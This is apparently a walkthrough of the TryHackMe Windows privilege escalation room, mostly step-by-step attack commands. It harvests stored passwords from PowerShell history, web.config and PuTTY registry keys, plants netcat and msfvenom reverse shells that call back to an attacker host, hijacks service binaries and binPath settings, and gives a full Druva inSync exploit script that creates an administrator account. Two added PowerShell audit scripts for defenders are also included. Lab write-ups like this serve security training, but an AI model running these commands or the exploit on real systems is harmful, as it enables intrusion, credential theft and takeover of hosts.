Room Link: https://tryhackme.com/room/windowsprivesc20
Harvesting Passwords from Usual Spots
A password for the julia.jones user has been left in the PowerShell history. What is the password?
Victim(cmd)
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
A web server is running on the remote host. Find any interesting password on web.config files associated with IIS. What is the password of the db_admin user?
Victim(cmd)
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
There is a saved password on your Windows credentials. Using cmdkey and runas, spawn a shell for mike.katz and retrieve the flag from his desktop.
Victim(cmd)
cmdkey /list
runas /savecred /user:WPRIVESC1\mike.katz cmd.exe
Retrieve the saved password stored in the saved PuTTY session under your profile. What is the password for the thom.smith user?
Victim(cmd)
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
Other Quick Wins
What is the taskusr1 flag?
Victim(cmd)
schtasks /query /tn vulntask /fo list /v
Victim(cmd)
icacls c:\tasks\schtask.bat
Kali
Victim
echo c:\tools\nc64.exe -e cmd.exe $KALI 4444 > C:\tasks\schtask.bat
schtasks /run /tn vulntask
Abusing Service Misconfigurations
Insecure Permissions on Service Executable
Get the flag on svcusr1's desktop
Victim(cmd)
sc qc WindowsScheduler
Victim(cmd)
icacls C:\PROGRA~2\SYSTEM~1\WService.exe
Kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4445 -f exe-service -o rev-svc.exe
python2 -m SimpleHTTPServer 81
Victim(Powershell)
wget http://$KALI:81/rev-svc.exe -O rev-svc.exe
Once the payload is on the Windows server, we replace the service executable with it. Because a different user account will execute the payload, we also grant full permissions to the Everyone group.
Victim(Powershell)
cd C:\PROGRA~2\SYSTEM~1\
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F
Kali
Note: in PowerShell, sc is an alias for Set-Content, so you need to call sc.exe explicitly to control services from PowerShell.
As a result, you'll get a reverse shell with svcusr1 privileges:
Victim(cmd)
sc stop windowsscheduler
sc start windowsscheduler
OR
Victim(Powershell)
sc.exe stop windowsscheduler
sc.exe start windowsscheduler
Unquoted Service Paths
Victim(cmd)
sc qc "disk sorter enterprise"
Kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4446 -f exe-service -o rev-svc2.exe
python2 -m SimpleHTTPServer 81
Victim(Powershell)
wget http://10.10.15.215:81/rev-svc2.exe -O rev-svc2.exe
move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:F
Kali
Victim(cmd)
sc.exe stop "disk sorter enterprise"
sc.exe start "disk sorter enterprise"
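The two service weaknesses above (a service binary that low-privileged users can overwrite, and an unquoted binary path containing spaces) are both visible from the service's PathName and the file ACL. The following audit script is an added example for administrators hardening their own hosts; it is not part of the TryHackMe room. It assumes an elevated PowerShell 5.1 or later prompt and uses only Get-CimInstance, Get-Acl and .NET FileSystemRights; the principal list and the helper names are my own.

```powershell
# Added example (not from the room): audit every service binary for an
# unquoted path with spaces and for write access granted to broad principals.
# Run from an elevated PowerShell prompt on a host you administer.

# Principals that should never be able to replace a service binary (assumption:
# extend this list to match your environment's groups).
$BroadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Any of these file rights is enough to swap the executable or its ACL.
$WriteRights = [System.Security.AccessControl.FileSystemRights]::Write -bor
               [System.Security.AccessControl.FileSystemRights]::Modify -bor
               [System.Security.AccessControl.FileSystemRights]::FullControl -bor
               [System.Security.AccessControl.FileSystemRights]::TakeOwnership -bor
               [System.Security.AccessControl.FileSystemRights]::ChangePermissions

function Get-ServiceBinaryPath {
    # Extract the executable from a service PathName (with or without quotes).
    param([string]$PathName)
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    # Unquoted: the executable ends at the first ".exe"; arguments may follow.
    if ($PathName -match '^(.*?\.exe)') { return $Matches[1] }
    return ($PathName -split '\s+')[0]
}

function Test-ServiceBinaries {
    $findings = @()
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName) { continue }
        $exe    = Get-ServiceBinaryPath $svc.PathName
        $quoted = $svc.PathName -match '^\s*"'

        # Finding 1: unquoted path whose executable part contains whitespace.
        if (-not $quoted -and $exe -match '\s') {
            $findings += [pscustomobject]@{
                Service = $svc.Name; Issue = 'Unquoted path with spaces'; Detail = $svc.PathName
            }
        }

        # Finding 2: a broad principal holds write rights on the binary itself.
        if (Test-Path -LiteralPath $exe) {
            try { $acl = Get-Acl -LiteralPath $exe } catch { continue }
            foreach ($ace in $acl.Access) {
                if ($ace.AccessControlType -ne 'Allow') { continue }
                if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
                if (($ace.FileSystemRights -band $WriteRights) -ne 0) {
                    $findings += [pscustomobject]@{
                        Service = $svc.Name
                        Issue   = "Binary writable by $($ace.IdentityReference.Value)"
                        Detail  = $exe
                    }
                }
            }
        }
    }
    return $findings
}

Test-ServiceBinaries | Format-Table -AutoSize
```

Remediation follows directly from each finding: quote the path with `sc.exe config <service> binPath= "\"C:\full path\to\binary.exe\""` and remove the broad ACE with `icacls <binary> /remove <principal>`. The script only reads service metadata and file ACLs, so it is safe to schedule as a recurring check.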
Insecure Service Permissions
Victim(cmd)
cd C:\tools\AccessChk
accesschk64.exe -qlc thmservice
Kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4447 -f exe-service -o rev-svc3.exe
python2 -m SimpleHTTPServer 81
Victim(Powershell)
wget http://10.10.15.215:81/rev-svc3.exe -O rev-svc3.exe
Kali
Victim(Powershell)
icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F
sc.exe config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem
sc.exe stop THMService
sc.exe start THMService
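accesschk64 shows who may reconfigure a service; the same information is in the service object's DACL, which sc.exe sdshow prints as SDDL. The script below is an added example for auditing that DACL on hosts you administer, not code from the TryHackMe room. It assumes PowerShell 5.1 or later and the built-in sc.exe; the access-mask constants are the documented Windows service and generic rights values, and the function name and "expected administrator" SID list are my own choices.

```powershell
# Added example (not from the room): list principals whose ACE on a service
# would let them change its configuration (binPath, account) or its DACL.

# Service-specific and generic access-mask bits that allow reconfiguration.
$SERVICE_CHANGE_CONFIG = 0x00000002
$WRITE_DAC             = 0x00040000
$WRITE_OWNER           = 0x00080000
$GENERIC_ALL           = 0x10000000
$GENERIC_WRITE         = 0x40000000
$DangerousMask = $SERVICE_CHANGE_CONFIG -bor $WRITE_DAC -bor $WRITE_OWNER -bor $GENERIC_ALL -bor $GENERIC_WRITE

# SIDs that legitimately hold these rights (assumption: LocalSystem and
# BUILTIN\Administrators). Anything else is worth a look.
$ExpectedAdminSids = @('S-1-5-18', 'S-1-5-32-544')

function Get-ServiceDaclFindings {
    param([Parameter(Mandatory)][string]$ServiceName)

    # sc.exe sdshow prints the service's security descriptor as an SDDL string.
    $sddl = (sc.exe sdshow $ServiceName | Where-Object { $_ -match '^D:' }) -join ''
    if (-not $sddl) { throw "No security descriptor returned for '$ServiceName'" }

    # Decode the SDDL so each ACE's raw access mask can be tested bit by bit.
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
        if (($ace.AccessMask -band $DangerousMask) -eq 0) { continue }

        $sid = $ace.SecurityIdentifier.Value
        try   { $who = $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $who = $sid }

        [pscustomobject]@{
            Service    = $ServiceName
            Principal  = $who
            AccessMask = ('0x{0:X8}' -f $ace.AccessMask)
            Expected   = ($ExpectedAdminSids -contains $sid)
        }
    }
}

# Single service, e.g. the one examined with accesschk above:
Get-ServiceDaclFindings -ServiceName THMService | Format-Table -AutoSize

# Every service on the host, showing only unexpected principals:
Get-Service | ForEach-Object { Get-ServiceDaclFindings -ServiceName $_.Name } |
    Where-Object { -not $_.Expected } | Format-Table -AutoSize
```

A row with Expected set to False means a non-administrator can change binPath or the service account, which is exactly the condition the sc.exe config step above relies on; fix it by rewriting the descriptor with `sc.exe sdset <service> <sddl>` after removing the offending ACE.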
Abusing dangerous privileges
Kali
Victim(Browser)
c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe 10.10.22.165 4442"
Abusing vulnerable software
Case Study: Druva inSync 6.6.3
Druva_inSync_exploit.ps1
$ErrorActionPreference = "Stop"
$cmd = "net user pwnd SimplePass123 /add & net localgroup administrators pwnd /add"
$s = New-Object System.Net.Sockets.Socket(
[System.Net.Sockets.AddressFamily]::InterNetwork,
[System.Net.Sockets.SocketType]::Stream,
[System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)
$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);
$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)
Victim
cd C:\tools\
.\Druva_inSync_exploit.ps1
Victim(Powershell)
runas /user:pwnd "C:\Windows\system32\cmd.exe"
Enter the password for pwnd: SimplePass123
Victim(cmd)
powershell.exe -Command "Start-Process cmd -ArgumentList '/k cd /d %cd%' -Verb RunAs"